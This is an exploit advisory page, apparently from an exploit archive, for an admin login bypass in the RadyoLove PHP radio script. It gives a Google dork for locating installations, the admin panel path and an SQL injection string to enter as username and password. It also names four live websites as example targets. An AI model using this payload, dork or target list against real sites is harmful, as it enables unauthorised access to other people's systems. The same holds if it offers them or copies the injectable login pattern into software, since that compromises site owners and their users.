RadyoLove Script Admin Login Bypass

2017.06.03
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

======================================================================== | # Title : RadyoLove Script Admin Login Bypass | # Author : Schiz0phracker | # Twitter : @hackingisamagic | # Tested on : Kali Linux | # Vendor : https://www.senolkayhan.com/2016/10/radyo-love-php-radyo-dinleme-scripti-indir.html | # Google Dork : inurl:index.php?s=djler ======================================================================== Proof : [+] Dorking in google [+] Open target [+] Go to admin login page = site.com/yonetim-paneli/ [+] Enter username and password with [+] Username: '=' 'or' [+] Password: '=' 'or' ====================================================== [+] Example Sites: [+] http://www.yekbas.net/yekbasfm/yonetim-paneli/ [+] http://www.radyof.com/yonetim-paneli/ [+] http://gungorenfm.com/yonetim-paneli/ [+] http://www.afsinradyo.com/yonetim-paneli/ ====================================================== We are: Computer Wizards Hacker Club Greetz: System Infector ======================================================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top